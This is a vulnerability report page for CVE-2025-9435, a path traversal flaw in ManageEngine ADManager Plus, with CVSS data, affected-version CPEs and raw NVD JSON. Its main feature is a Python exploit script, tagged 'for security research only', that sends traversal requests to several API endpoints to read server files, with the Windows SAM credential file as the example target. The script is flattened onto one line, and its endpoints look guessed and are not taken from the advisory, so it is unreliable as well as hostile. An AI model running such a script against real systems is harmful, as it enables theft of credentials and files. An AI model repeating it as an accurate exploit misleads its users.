Security Vulnerability Report
中文
CVE-2025-9435 CVSS 5.5 MEDIUM

CVE-2025-9435

Published: 2026-01-13 14:16:38
Last Modified: 2026-01-29 19:11:00
Source: 0fc0942c-577d-436f-ae8e-945763c79b02

Description

Zohocorp ManageEngine ADManager Plus versions below 7230 are vulnerable to Path Traversal in the User Management module

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:zohocorp:manageengine_admanager_plus:7.2:7200:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:zohocorp:manageengine_admanager_plus:7.2:7201:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:zohocorp:manageengine_admanager_plus:7.2:7202:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:zohocorp:manageengine_admanager_plus:7.2:7203:*:*:*:*:*:* - VULNERABLE
ManageEngine ADManager Plus < 7230

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-9435 Path Traversal PoC for ManageEngine ADManager Plus # Target: ManageEngine ADManager Plus < 7230 def exploit_path_traversal(target_url, file_path): """ Exploit path traversal vulnerability in User Management module file_path: Target file to read (e.g., ../../../../windows/system32/config/sam) """ endpoints = [ "/api/user/import", "/api/user/profile-picture", "/api/reports/export", "/api/attachments/download" ] for endpoint in endpoints: url = f"{target_url}{endpoint}" # Path traversal payload params = { "file": f"{file_path}", "module": "UserManagement" } headers = { "Content-Type": "application/json", "Authorization": "Basic <base64_credentials>" } try: response = requests.get(url, params=params, headers=headers, timeout=10) if response.status_code == 200 and len(response.content) > 0: print(f"[+] Success! File content from {file_path}") print(response.text[:500]) return True elif response.status_code == 403: print(f"[*] Access denied at {endpoint}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-9435.py <target_url> <file_path>") print("Example: python cve-2025-9435.py http://target.com:8080 ../../../../windows/system32/config/sam") sys.exit(1) target = sys.argv[1] file_path = sys.argv[2] print(f"[*] Exploiting CVE-2025-9435 on {target}") exploit_path_traversal(target, file_path)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9435", "sourceIdentifier": "0fc0942c-577d-436f-ae8e-945763c79b02", "published": "2026-01-13T14:16:37.907", "lastModified": "2026-01-29T19:10:59.800", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zohocorp ManageEngine ADManager Plus versions below 7230 are vulnerable to Path Traversal in the User Management module"}, {"lang": "es", "value": "Las versiones de Zohocorp ManageEngine ADManager Plus inferiores a 7230 son vulnerables a salto de ruta en el módulo de Gestión de Usuarios"}], "metrics": {"cvssMetricV31": [{"source": "0fc0942c-577d-436f-ae8e-945763c79b02", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 3.4}]}, "weaknesses": [{"source": "0fc0942c-577d-436f-ae8e-945763c79b02", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.2", "matchCriteriaId": "7927FC8C-ED61-4E24-AF57-2D5C0E06AB2A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_admanager_plus:7.2:7200:*:*:*:*:*:*", "matchCriteriaId": "1AE608DF-E02C-4A63-AD3E-7E3C1B921C3D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_admanager_plus:7.2:7201:*:*:*:*:*:*", "matchCriteriaId": "72C14C6D-5C72-4A39-A8FF-93CD89C831C9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_admanager_plus:7.2:7202:*:*:*:*:*:*", "matchCriteriaId": "D47DA377-0AF4-453E-9605-A5F87FA14E61"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_admanager_plus:7.2:7203:*:*:*:*:*:*", "matchCriteriaId": "BC919233-CE66-416C-8649-B94A23F131F5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_admanager_plus:7.2:7210:*:*:*:*:*:*", "matchCriteriaId": "AD2880B4-88AD-49E4-B423-5C0CCCF5DF4B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_admanager_plus:7.2:7211:*:*:*:*:*:*", "matchCriteriaId": "C8BCAFB6-F46D-4E09-8827-13ED1A7D5740"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_admanager_plus:7.2:7212:*:*:*:*:*:*", "matchCriteriaId": "0D0166A3-B34B-44FC-9DB8-E06BDDAC7CC8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_admanager_plus:7.2:7220:*:*:*:*:*:*", "matchCriteriaId": "CE25B1E5-D380-490C-98A6-121FA10A3311"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_admanager_plus:7.2:7221:*:*:*:*:*:*", "matchCriteriaId": "50283EE9-A9EC-4BD2-958E-F2A278B84C0B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_admanager_plus:7.2:7222:*:*:*:*:*:*", "matchCriteriaId": "645C5636-1E03-47D2-834B-3DE95B347E1F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_admanager_plus:7.2:7223:*:*:*:*:*:*", "matchCriteriaId": "4340408B-3928-430F-BDBA-10E43F25C595"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_admanager_plus:7.2:7224:*:*:*:*:*:*", "matchCriteriaId": "C792F787-B6F6-4908-923C-25679BA67988"}]}]}], "references": [{"url": "https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2025-9435.html", "source": "0fc0942c-577d-436f-ae8e-945763c79b02", "tags": ["Patch", "Vendor Advisory"]}]}}